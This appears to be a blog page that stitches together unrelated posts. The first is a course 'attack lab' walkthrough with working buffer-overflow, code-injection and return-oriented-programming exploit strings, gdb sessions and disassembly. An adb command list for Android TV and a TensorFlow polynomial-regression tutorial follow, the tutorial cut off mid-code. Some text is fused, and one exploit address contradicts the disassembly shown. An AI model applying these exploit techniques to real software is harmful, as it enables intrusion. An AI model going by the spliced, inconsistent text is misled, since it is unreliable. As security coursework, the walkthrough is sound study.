Buffer Overflow: A buffer overrun happens when the size of the data exceeds the memory size reserved for the buffer we are storing in our value.
Now, since we know the buffer size we can try passing the address of the touch1 function after we pad it up with the buffer size.
jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$ cat dis.txt | grep touch1
000000000040261e <touch1>:
We were told in our recitation that our system was little-endian (so the bytes will be in the reverse order). Otherwise, we can use python to check:
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ python -c 'import sys; print(sys.byteorder)'
little
We have our padding size and the function we need to call, we can write it in ctarget.l1.txt
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
1e 26 40 00 00 00 00 00
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l1.txt | ./ctarget
Cookie: 0x3e8dee8f
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
Phase 2 involves injecting a small amount of code as part of your exploit string.
Within the file ctarget there is code for a function touch2 having the following C representation: Attack Lab Handout
void touch2(unsigned val)
{
vlevel = 2;
if (val == cookie) {
printf("Touch2!: You called touch2(0x%.8x)\n", val);
validate(2);
} else {
printf("Misfire: You called touch2(0x%.8x)\n", val);
fail(2);
}
exit(0);
}
Your task is to get CTARGET to execute the code for touch2 rather than returning to test. In this case, however, you must make it appear to touch2 as if you have passed your cookie as its argument.
Recall that the first argument to a function is passed in register %rdi Attack Lab Handout
This hint tells us that we need to store the cookie in the rdi register
movq $0x3e8dee8f,%rdi
retq
To get the byte representation, we need to compile the code and then disassemble it.
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase2.s && objdump -d phase2.o
phase2.s: Assembler messages:
phase2.s: Warning: end of file not at end of a line; newline inserted
phase2.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 8f ee 8d 3e mov $0x3e8dee8f,%rdi
7: c3 ret
Thus, the byte representation for our asm code is 48 c7 c7 8f ee 8d 3e c3
We also need to figure out the address to the %rsp
register. Again, looking at the getbuf
code
0000000000402608 <getbuf>:
402608: 48 83 ec 18 sub $0x18,%rsp
40260c: 48 89 e7 mov %rsp,%rdi
40260f: e8 95 02 00 00 call 4028a9 <Gets>
402614: b8 01 00 00 00 mov $0x1,%eax
402619: 48 83 c4 18 add $0x18,%rsp
40261d: c3 ret
We need to find the address of %rsp
after calling <Gets>
and sending a really long string.
What we are going to do now is to add a break on getbuf
, and run the program just after it asks us to enter a string and then find the address of %rsp
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gdb ./ctarget
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./ctarget...
(gdb) b getbuf
Breakpoint 1 at 0x402608: file buf.c, line 12.
(gdb) run
Starting program: /home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget
Cookie: 0x3e8dee8f
Breakpoint 1, getbuf () at buf.c:12
12 buf.c: No such file or directory.
(gdb) disas
Dump of assembler code for function getbuf:
=> 0x0000000000402608 <+0>: sub $0x18,%rsp
0x000000000040260c <+4>: mov %rsp,%rdi
0x000000000040260f <+7>: call 0x4028a9 <Gets>
0x0000000000402614 <+12>: mov $0x1,%eax
0x0000000000402619 <+17>: add $0x18,%rsp
0x000000000040261d <+21>: ret
End of assembler dump.
(gdb) until *0x402614
Type string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe
getbuf () at buf.c:15
15 in buf.c
(gdb) x/s $rsp
0x55621b40: "fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe"
(gdb)
So, the address for %rsp
is 0x55621b40
Thus, we can set our ctarget.l2.txt
as:
byte representation of ASM code
padding
address of %rsp
address of touch2 function
To get the address of touch2
we can run:
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch2
000000000040264e <touch2>:
402666: 74 2a je 402692 <touch2+0x44>
4026b2: eb d4 jmp 402688 <touch2+0x3a>
48 c7 c7 8f ee 8d 3e c3
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
40 1b 62 55 00 00 00 00
4e 26 b2 00 00 00 00 00
Do note that our required padding is 24 bytes, we are only adding 16 bytes because our asm code is 8 bytes on its own. Our goal is to have a total of 24 bytes in padding, not 8 + 24 bytes,
joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l2.txt | ./ctarget
Cookie: 0x3e8dee8f
Type string:Touch2!: You called touch2(0x3e8dee8f)
Valid solution for level 2 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
Phase 3 also involves a code injection attack, but passing a string as argument.
You will need to include a string representation of your cookie in your exploit string. The string should consist of the eight hexadecimal digits (ordered from most to least significant) without a leading “0x.”
Your injected code should set register %rdi to the address of this string
When functions hexmatch and strncmp are called, they push data onto the stack, overwriting portions of memory that held the buffer used by getbuf. As a result, you will need to be careful where you place the string representation of your cookie. Attack Lab Handout
Because hexmatch
and strncmp
might overwrite the buffer allocated for getbuf
we will try to store the data after the function touch3
itself.
The rationale is simple: by the time our payload is executed, we will be setting %rdi
to point to the cookie. Placing the cookie after touch3
function ensures that it will not be overwritten by the function calls. It also means that we can calculate the address of the cookie with relative ease, based on the known offsets.
=> The total bytes before the cookie = Buffer (0x18 in our case) + Return Address of %rsp (8 bytes) + Touch 3 (8 Bytes) = 0x18 + 8 + 8 = 28 (hex)
touch3
function)touch3
function is 8 bytes long.We can use our address for %rsp
from phase 2, and simply add 0x28
to it.
=> 0x55621b40
+ 0x28
= 0x55621B68
Again, let us get the binary representation for the ASM code:
movq $0x55621B68, %rdi
retq
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ gcc -c phase3.s && objdump -d phase3.o
phase3.s: Assembler messages:
phase3.s: Warning: end of file not at end of a line; newline inserted
phase3.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: 48 c7 c7 68 1b 62 55 mov $0x55621b68,%rdi
7: c3 ret
Thus, our answer is going to be in the form:
asm code
padding
return address / %rsp
touch3 address
cookie string
To quickly get the address for touch3
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ cat dis.txt | grep touch3
0000000000402763 <touch3>:
402781: 74 2d je 4027b0 <touch3+0x4d>
4027d3: eb d1 jmp 4027a6 <touch3+0x43>
We need to use an ASCII to Hex converter to convert the cookie string into hex.
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ echo -n 3e8dee8f | xxd -p
3365386465653866
Thus, our cookie string representation is 33 65 38 64 65 65 38 66
48 c7 c7 68 1B 62 55 c3
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
40 1b 62 55 00 00 00 00
63 27 40 00 00 00 00 00
33 65 38 64 65 65 38 66
jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$ ./hex2raw < ctarget.l3.txt | ./ctarget
Cookie: 0x3e8dee8f
Type string:Touch3!: You called touch3("3e8dee8f")
Valid solution for level 3 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
Phases 1-3 Complete.
For Phase 4, you will repeat the attack of Phase 2, but do so on program RTARGET using gadgets from your gadget farm. You can construct your solution using gadgets consisting of the following instruction types, and using only the first eight x86-64 registers (%rax–%rdi). * movq * popq * ret * nop
All the gadgets you need can be found in the region of the code for rtarget demarcated by the functions startfarm and midfarm
You can do this attack with just two gadgets
When a gadget uses a popq instruction, it will pop data from the stack. As a result, your exploit string will contain a combination of gadget addresses and data. Attack Lab Handout
What is ROP Attack?
is a computer security exploit technique in which the attacker uses control of the call stack to indirectly execute cherry-picked machine instructions https://resources.infosecinstitute.com
Let us check if we can find popq %rdi
between start_farm
and end_farm
The way a normal person would find the hex representation 58
to be between start_farm
and end_farm
is to find the line numbers for both and
then search between those lines. But, what if you don't want to move away from the terminal?
Assuming, the disassembled code for rtarget
is stored in dis2.txt
(objdump -d rtarget > dis2.txt
)
jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ sed -n '/start_farm/,/end_farm/p' dis2.txt | grep -n2 " 58"
16-000000000040281f <getval_373>:
17- 40281f: f3 0f 1e fa endbr64
18: 402823: b8 d3 f5 c2 58 mov $0x58c2f5d3,%eax
19- 402828: c3 ret
20-
--
26-0000000000402834 <setval_212>:
27- 402834: f3 0f 1e fa endbr64
28: 402838: c7 07 58 90 c3 92 movl $0x92c39058,(%rdi)
29- 40283e: c3 ret
30-
--
41-0000000000402854 <setval_479>:
42- 402854: f3 0f 1e fa endbr64
43: 402858: c7 07 58 c7 7f 61 movl $0x617fc758,(%rdi)
44- 40285e: c3 ret
45-
If we were to pick the first one as our gadget, the instruction address is 0x402823
, but to get to the instruction 58
we need to add 4 bytes:
=> Gadget address = 0x402823 + 0x4 = 0x402827
The PDF already provides the next gadget we are supposed to look for 48 89 c7
jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ sed -n '/start_farm/,/end_farm/p' dis2.txt | grep -n2 "48 89 c7"
11-0000000000402814 <setval_253>:
12- 402814: f3 0f 1e fa endbr64
13: 402818: c7 07 48 89 c7 94 movl $0x94c78948,(%rdi)
14- 40281e: c3 ret
15-
--
31-000000000040283f <getval_424>:
32- 40283f: f3 0f 1e fa endbr64
33: 402843: b8 48 89 c7 c3 mov $0xc3c78948,%eax
34- 402848: c3 ret
35-
36-0000000000402849 <setval_417>:
37- 402849: f3 0f 1e fa endbr64
38: 40284d: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
39- 402853: c3 ret
40-
jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$
We cannot use the first match because it is followed by 0x94
instead of c3
, either of the next two matches will work (0x90
is nop
and it does nothing but increment the program counter by 1)
Again, we have to account for the offset.
Taking 0x402843
we need to add just 1 byte.
=> 0x402843 + 1 = 0x402844
Our answer for this file is going to be:
padding
gadget1
cookie
gadget2
touch2
jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ cat dis2.txt | grep touch2
000000000040264e <touch2>:
402666: 74 2a je 402692 <touch2+0x44>
4026b2: eb d4 jmp 402688 <touch2+0x3a>
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
27 28 40 00 00 00 00 00
8f ee 8d 3e 00 00 00 00
44 28 40 00 00 00 00 00
4e 26 40 00 00 00 00 00
jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ ./hex2raw < ./rtarget.l2.txt | ./rtarget
Cookie: 0x3e8dee8f
Type string:Touch2!: You called touch2(0x3e8dee8f)
Valid solution for level 2 with target rtarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
So I have an Android TV, this posts covers everything I have tried on it
These steps should be similar for all Android-TVs
The other option is to go to your router's server page and get connected devices
adb connect <IP_ADDRESS>
adb logcat
adb shell
pm list packages
adb install -r package.apk
adb uninstall com.company.yourpackagename
In this tutorial you will learn about polynomial regression and how you can implement it in Tensorflow.
In this, we will be performing polynomial regression using 5 types of equations -
Regression is a statistical measurement that is used to try to determine the relationship between a dependent variable (often denoted by Y), and series of varying variables (called independent variables, often denoted by X ).
This is a form of Regression Analysis where the relationship between Y and X is denoted as the nth degree/power of X. Polynomial regression even fits a non-linear relationship (e.g when the points don't form a straight line).
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
Even though in this tutorial we will use a Position Vs Salary dataset, it is important to know how to create synthetic data
To create 50 values spaced evenly between 0 and 50, we use NumPy's linspace function
linspace(lower_limit, upper_limit, no_of_observations)
x = np.linspace(0, 50, 50)
y = np.linspace(0, 50, 50)
We use the following function to add noise to the data, so that our values
x += np.random.uniform(-4, 4, 50)
y += np.random.uniform(-4, 4, 50)
We will be using https://drive.google.com/file/d/1tNL4jxZEfpaP4oflfSn6pIHJX7Pachm9/view (Salary vs Position Dataset)
!wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=1tNL4jxZEfpaP4oflfSn6pIHJX7Pachm9' -O data.csv
df = pd.read_csv("data.csv")
df # this gives us a preview of the dataset we are working with
| Position | Level | Salary |
|-------------------|-------|---------|
| Business Analyst | 1 | 45000 |
| Junior Consultant | 2 | 50000 |
| Senior Consultant | 3 | 60000 |
| Manager | 4 | 80000 |
| Country Manager | 5 | 110000 |
| Region Manager | 6 | 150000 |
| Partner | 7 | 200000 |
| Senior Partner | 8 | 300000 |
| C-level | 9 | 500000 |
| CEO | 10 | 1000000 |
We convert the salary column as the ordinate (y-coordinate) and level column as the abscissa
abscissa = df["Level"].to_list() # abscissa = [1,2,3,4,5,6,7,8,9,10]
ordinate = df["Salary"].to_list() # ordinate = [45000,50000,60000,80000,110000,150000,200000,300000,500000,1000000]
n = len(abscissa) # no of observations
plt.scatter(abscissa, ordinate)
plt.ylabel('Salary')
plt.xlabel('Position')
plt.title("Salary vs Position")
plt.show()
X = tf.placeholder("float")
Y = tf.placeholder("float")
We first define all the coefficients and constant as tensorflow variables having a random initial value
a = tf.Variable(np.random.randn(), name = "a")
b = tf.Variable(np.random.randn(), name = "b")
c = tf.Variable(np.random.randn(), name = "c")
d = tf.Variable(np.random.randn(), name = "d")
e = tf.Variable(np.random.randn(), name = "e")
f = tf.Variable(np.random.randn(), name = "f")
learning_rate = 0.2
no_of_epochs = 25000
deg1 = a*X + b
deg2 = a*tf.pow(X,2) + b*X + c
deg3 = a*tf.pow(X,3) + b*tf.pow(X,2) + c*X + d
deg4 = a*tf.pow(X,4) + b*tf.pow(X,3) + c*tf.pow(X,2) + d*X + e
deg5 = a*tf.pow(X,5) + b*tf.pow(X,4) + c*tf.pow(X,3) + d*tf.pow(X,2) + e*X + f
We use the Mean Squared Error Function
mse1 = tf.reduce_sum(tf.pow(deg1-Y,2))/(2*n)
mse2 = tf.reduce_sum(tf.pow(deg2-Y,2))/(2*n)
mse3 = tf.reduce_sum(tf.pow(deg3-Y,2))/(2*n)
mse4 = tf.reduce_sum(tf.pow(deg4-Y,2))/(2*n)
mse5 = tf.reduce_sum(tf.pow(deg5-Y,2))/(2*n)
We use the AdamOptimizer for the polynomial functions and GradientDescentOptimizer for the linear function
optimizer1 = tf.train.GradientDescentOptimizer(learning_rate).minimize(mse1)
optimizer2 = tf.train.AdamOptimizer(learning_rate).minimize(mse2)
optimizer3 = tf.train.AdamOptimizer(learning_rate).minimize(mse3)
optimizer4 = tf.train.AdamOptimizer(learning_rate).minimize(mse4)
optimizer5 = tf.train.AdamOptimizer(learning_rate).minimize(mse5)
init=tf.global_variables_initializer()
For each type of equation first we make the model predict the values of the coefficient(s) and constant, once we get these values we use it to predict the Y values using the X values. We then plot it to compare the actual data and predicted line.
with tf.Session() as sess:
sess.run(init)
for epoch in range(no_of_epochs):
for (x,y) in zip(abscissa, ordinate):
sess.run(optimizer1, feed_dict={X:x, Y:y})
if (epoch+1)%1000==0:
cost = sess.run(mse1,feed_dict={X:abscissa,Y:ordinate})
print("Epoch",(epoch+1), ": Training Cost:", cost," a,b:",sess.run(a),sess.run(b))
training_cost = sess.run(mse1,feed_dict={X:abscissa,Y:ordinate})
coefficient1 = sess.run(a)
constant = sess.run(b)
print(training_cost, coefficient1, constant)
Epoch 1000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 2000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 3000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 4000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 5000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 6000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 7000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 8000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 9000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 10000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 11000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 12000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 13000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 14000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 15000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 16000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 17000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 18000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 19000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 20000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 21000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 22000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 23000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 24000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
Epoch 25000 : Training Cost: 88999125000.0 a,b: 180396.42 -478869.12
88999125000.0 180396.42 -478869.12
predictions = []
for x in abscissa:
predictions.append((coefficient1*x + constant))
plt.plot(abscissa , ordinate, 'ro', label ='Original data')
plt.plot(abscissa, predictions, label ='Fitted line')
plt.title('Linear Regression Result')
plt.legend()
plt.show()
with tf.Session() as sess:
sess.run(init)
for epoch in range(no_of_epochs):
for (x,y) in zip(abscissa, ordinate):
sess.run(optimizer2, feed_dict={X:x, Y:y})
if (epoch+1)%1000==0:
cost = sess.run(mse2,feed_dict={X:abscissa,Y:ordinate})
print("Epoch",(epoch+1), ": Training Cost:", cost," a,b,c:",sess.run(a),sess.run(b),sess.run(c))
training_cost = sess.run(mse2,feed_dict={X:abscissa,Y:ordinate})
coefficient1 = sess.run(a)
coefficient2 = sess.run(b)
constant = sess.run(c)
print(training_cost, coefficient1, coefficient2, constant)
Epoch 1000 : Training Cost: 52571360000.0 a,b,c: 1002.4456 1097.0197 1276.6921
Epoch 2000 : Training Cost: 37798890000.0 a,b,c: 1952.4263 2130.2825 2469.7756
Epoch 3000 : Training Cost: 26751185000.0 a,b,c: 2839.5825 3081.6118 3554.351
Epoch 4000 : Training Cost: 19020106000.0 a,b,c: 3644.56 3922.9563 4486.3135
Epoch 5000 : Training Cost: 14060446000.0 a,b,c: 4345.042 4621.4233 5212.693
Epoch 6000 : Training Cost: 11201084000.0 a,b,c: 4921.1855 5148.1504 5689.0713
Epoch 7000 : Training Cost: 9732740000.0 a,b,c: 5364.764 5493.0156 5906.754
Epoch 8000 : Training Cost: 9050918000.0 a,b,c: 5685.4067 5673.182 5902.0728
Epoch 9000 : Training Cost: 8750394000.0 a,b,c: 5906.9814 5724.8906 5734.746
Epoch 10000 : Training Cost: 8613128000.0 a,b,c: 6057.3677 5687.3364 5461.167
Epoch 11000 : Training Cost: 8540034600.0 a,b,c: 6160.547 5592.3022 5122.8633
Epoch 12000 : Training Cost: 8490983000.0 a,b,c: 6233.9175 5462.025 4747.111
Epoch 13000 : Training Cost: 8450816500.0 a,b,c: 6289.048 5310.7583 4350.6997
Epoch 14000 : Training Cost: 8414082000.0 a,b,c: 6333.199 5147.394 3943.9294
Epoch 15000 : Training Cost: 8378841600.0 a,b,c: 6370.7944 4977.1704 3532.476
Epoch 16000 : Training Cost: 8344471000.0 a,b,c: 6404.468 4803.542 3120.2087
Epoch 17000 : Training Cost: 8310785500.0 a,b,c: 6435.365 4628.1523 2709.1445
Epoch 18000 : Training Cost: 8277482000.0 a,b,c: 6465.5493 4451.833 2300.2783
Epoch 19000 : Training Cost: 8244650000.0 a,b,c: 6494.609 4274.826 1894.3738
Epoch 20000 : Training Cost: 8212349000.0 a,b,c: 6522.8247 4098.1733 1491.9915
Epoch 21000 : Training Cost: 8180598300.0 a,b,c: 6550.6567 3922.7405 1093.3868
Epoch 22000 : Training Cost: 8149257700.0 a,b,c: 6578.489 3747.8362 698.53357
Epoch 23000 : Training Cost: 8118325000.0 a,b,c: 6606.1973 3573.2742 307.3541
Epoch 24000 : Training Cost: 8088001000.0 a,b,c: 6632.96 3399.878 -79.89219
Epoch 25000 : Training Cost: 8058094600.0 a,b,c: 6659.793 3227.2517 -463.03156
8058094600.0 6659.793 3227.2517 -463.03156
predictions = []
for x in abscissa:
predictions.append((coefficient1*pow(x,2) + coefficient2*x + constant))
plt.plot(abscissa , ordinate, 'ro', label ='Original data')
plt.plot(abscissa, predictions, label ='Fitted line')
plt.title('Quadratic Regression Result')
plt.legend()
plt.show()
with tf.Session() as sess:
sess.run(init)
for epoch in range(no_of_epochs):
for (x,y) in zip(abscissa, ordinate):
sess.run(optimizer3, feed_dict={X:x, Y:y})
if (epoch+1)%1000==0:
cost = sess.run(mse3,feed_dict={X:abscissa,Y:ordinate})
print("Epoch",(epoch+1), ": Training Cost:", cost," a,b,c,d:",sess.run(a),sess.run(b),sess.run(c),sess.run(d))
training_cost = sess.run(mse3,feed_dict={X:abscissa,Y:ordinate})
coefficient1 = sess.run(a)
coefficient2 = sess.run(b)
coefficient3 = sess.run(c)
constant = sess.run(d)
print(training_cost, coefficient1, coefficient2, coefficient3, constant)
Epoch 1000 : Training Cost: 4279814000.0 a,b,c,d: 670.1527 694.4212 751.4653 903.9527
Epoch 2000 : Training Cost: 3770950400.0 a,b,c,d: 742.6414 666.3489 636.94525 859.2088
Epoch 3000 : Training Cost: 3717708300.0 a,b,c,d: 756.2582 569.3339 448.105 748.23956
Epoch 4000 : Training Cost: 3667464000.0 a,b,c,d: 769.4476 474.0318 265.5761 654.75525
Epoch 5000 : Training Cost: 3620040700.0 a,b,c,d: 782.32324 380.54272 89.39888 578.5136
Epoch 6000 : Training Cost: 3575265800.0 a,b,c,d: 794.8898 288.83356 -80.5215 519.13654
Epoch 7000 : Training Cost: 3532972000.0 a,b,c,d: 807.1608 198.87044 -244.31102 476.2061
Epoch 8000 : Training Cost: 3493009200.0 a,b,c,d: 819.13513 110.64169 -402.0677 449.3291
Epoch 9000 : Training Cost: 3455228400.0 a,b,c,d: 830.80255 24.0964 -553.92804 438.0652
Epoch 10000 : Training Cost: 3419475500.0 a,b,c,d: 842.21594 -60.797424 -700.0123 441.983
Epoch 11000 : Training Cost: 3385625300.0 a,b,c,d: 853.3363 -144.08699 -840.467 460.6356
Epoch 12000 : Training Cost: 3353544700.0 a,b,c,d: 864.19135 -225.8125 -975.4196 493.57703
Epoch 13000 : Training Cost: 3323125000.0 a,b,c,d: 874.778 -305.98932 -1104.9867 540.39465
Epoch 14000 : Training Cost: 3294257000.0 a,b,c,d: 885.1007 -384.63474 -1229.277 600.65607
Epoch 15000 : Training Cost: 3266820000.0 a,b,c,d: 895.18823 -461.819 -1348.4417 673.9051
Epoch 16000 : Training Cost: 3240736000.0 a,b,c,d: 905.0128 -537.541 -1462.6171 759.7118
Epoch 17000 : Training Cost: 3215895000.0 a,b,c,d: 914.60065 -611.8676 -1571.9058 857.6638
Epoch 18000 : Training Cost: 3192216800.0 a,b,c,d: 923.9603 -684.8093 -1676.4642 967.30475
Epoch 19000 : Training Cost: 3169632300.0 a,b,c,d: 933.08594 -756.3582 -1776.4275 1088.2198
Epoch 20000 : Training Cost: 3148046300.0 a,b,c,d: 941.9928 -826.6257 -1871.9355 1219.9702
Epoch 21000 : Training Cost: 3127394800.0 a,b,c,d: 950.67896 -895.6205 -1963.0989 1362.1665
Epoch 22000 : Training Cost: 3107608600.0 a,b,c,d: 959.1487 -963.38116 -2050.0586 1514.4026
Epoch 23000 : Training Cost: 3088618200.0 a,b,c,d: 967.4355 -1029.9625 -2132.961 1676.2717
Epoch 24000 : Training Cost: 3070361300.0 a,b,c,d: 975.52875 -1095.4292 -2211.854 1847.4485
Epoch 25000 : Training Cost: 3052791300.0 a,b,c,d: 983.4346 -1159.7922 -2286.9412 2027.4857
3052791300.0 983.4346 -1159.7922 -2286.9412 2027.4857
predictions = []
for x in abscissa:
predictions.append((coefficient1*pow(x,3) + coefficient2*pow(x,2) + coefficient3*x + constant))
plt.plot(abscissa , ordinate, 'ro', label ='Original data')
plt.plot(abscissa, predictions, label ='Fitted line')
plt.title('Cubic Regression Result')
plt.legend()
plt.show()
with tf.Session() as sess:
sess.run(init)
for epoch in range(no_of_epochs):
for (x,y) in zip(abscissa, ordinate):
sess.run(optimizer4, feed_dict={X:x, Y:y})
if (epoch+1)%1000==0:
cost = sess.run(mse4,feed_dict={X:abscissa,Y:ordinate})
print("Epoch",(epoch+1), ": Training Cost:", cost," a,b,c,d:",sess.run(a),sess.run(b),sess.run(c),sess.run(d),sess.run(e))
training_cost = sess.run(mse4,feed_dict={X:abscissa,Y:ordinate})
coefficient1 = sess.run(a)
coefficient2 = sess.run(b)
coefficient3 = sess.run(c)
coefficient4 = sess.run(d)
constant = sess.run(e)
print(training_cost, coefficient1, coefficient2, coefficient3, coefficient4, constant)
Epoch 1000 : Training Cost: 1902632600.0 a,b,c,d: 84.48304 52.210594 54.791424 142.51952 512.0343
Epoch 2000 : Training Cost: 1854316200.0 a,b,c,d: 88.998955 13.073557 14.276088 223.55667 1056.4655
Epoch 3000 : Training Cost: 1812812400.0 a,b,c,d: 92.9462 -22.331177 -15.262934 327.41858 1634.9054
Epoch 4000 : Training Cost: 1775716000.0 a,b,c,d: 96.42522 -54.64535 -35.829437 449.5028 2239.1392
Epoch 5000 : Training Cost: 1741494100.0 a,b,c,d: 99.524734 -84.43976 -49.181057 585.85876 2862.4915
Epoch 6000 : Training Cost: 1709199600.0 a,b,c,d: 102.31984 -112.19895 -56.808075 733.1876 3499.6199
Epoch 7000 : Training Cost: 1678261800.0 a,b,c,d: 104.87324 -138.32709 -59.9442 888.79626 4146.2944
Epoch 8000 : Training Cost: 1648340600.0 a,b,c,d: 107.23536 -163.15173 -59.58964 1050.524 4798.979
Epoch 9000 : Training Cost: 1619243400.0 a,b,c,d: 109.44742 -186.9409 -56.53944 1216.6432 5454.9463
Epoch 10000 : Training Cost: 1590821900.0 a,b,c,d: 111.54233 -209.91287 -51.423084 1385.8513 6113.5137
Epoch 11000 : Training Cost: 1563042200.0 a,b,c,d: 113.54405 -232.21953 -44.73371 1557.1084 6771.7046
Epoch 12000 : Training Cost: 1535855600.0 a,b,c,d: 115.471565 -253.9838 -36.851135 1729.535 7429.069
Epoch 13000 : Training Cost: 1509255300.0 a,b,c,d: 117.33939 -275.29697 -28.0714 1902.5308 8083.9634
Epoch 14000 : Training Cost: 1483227000.0 a,b,c,d: 119.1605 -296.2472 -18.618649 2075.6094 8735.381
Epoch 15000 : Training Cost: 1457726700.0 a,b,c,d: 120.94584 -316.915 -8.650095 2248.3247 9384.197
Epoch 16000 : Training Cost: 1432777300.0 a,b,c,d: 122.69806 -337.30704 1.7027153 2420.5771 10028.871
Epoch 17000 : Training Cost: 1408365000.0 a,b,c,d: 124.42179 -357.45245 12.33499 2592.2983 10669.157
Epoch 18000 : Training Cost: 1384480000.0 a,b,c,d: 126.12332 -377.39734 23.168756 2763.0933 11305.027
Epoch 19000 : Training Cost: 1361116800.0 a,b,c,d: 127.80568 -397.16415 34.160156 2933.0452 11935.669
Epoch 20000 : Training Cost: 1338288100.0 a,b,c,d: 129.4674 -416.72803 45.259155 3101.7727 12561.179
Epoch 21000 : Training Cost: 1315959700.0 a,b,c,d: 131.11403 -436.14285 56.4436 3269.3142 13182.058
Epoch 22000 : Training Cost: 1294164700.0 a,b,c,d: 132.74377 -455.3779 67.6757 3435.3833 13796.807
Epoch 23000 : Training Cost: 1272863600.0 a,b,c,d: 134.35779 -474.45316 78.96117 3600.264 14406.58
Epoch 24000 : Training Cost: 1252052600.0 a,b,c,d: 135.9583 -493.38254 90.268616 3764.0078 15010.481
Epoch 25000 : Training Cost: 1231713700.0 a,b,c,d: 137.54753 -512.1876 101.59372 3926.4897 15609.368
1231713700.0 137.54753 -512.1876 101.59372 3926.4897 15609.368
predictions = []
for x in abscissa:
predictions.append((coefficient1*pow(x,4) + coefficient2*pow(x,3) + coefficient3*pow(x,2) + coefficient4*x + constant))
plt.plot(abscissa , ordinate, 'ro', label ='Original data')
plt.plot(abscissa, predictions, label ='Fitted line')
plt.title('Quartic Regression Result')
plt.legend()
plt.show()
with tf.Session() as sess:
sess.run(init)
for epoch in range(no_of_epochs):
for (x,y) in zip(abscissa, ordinate):
sess.run(optimizer5, feed_dict={X:x, Y:y})
if (epoch+1)%1000==0:
cost = sess.run(mse5,feed_dict={X:abscissa,Y:ordinate})
print("Epoch",(epoch+1), ": Training Cost:", cost," a,b,c,d,e,f:",sess.run(a),sess.run(b),sess.run(c),sess.run(d),sess.run(e),sess.run(f))
training_cost = sess.run(mse5,feed_dict={X:abscissa,Y:ordinate})
coefficient1 = sess.run(a)
coefficient2 = sess.run(b)
coefficient3 = sess.run(c)
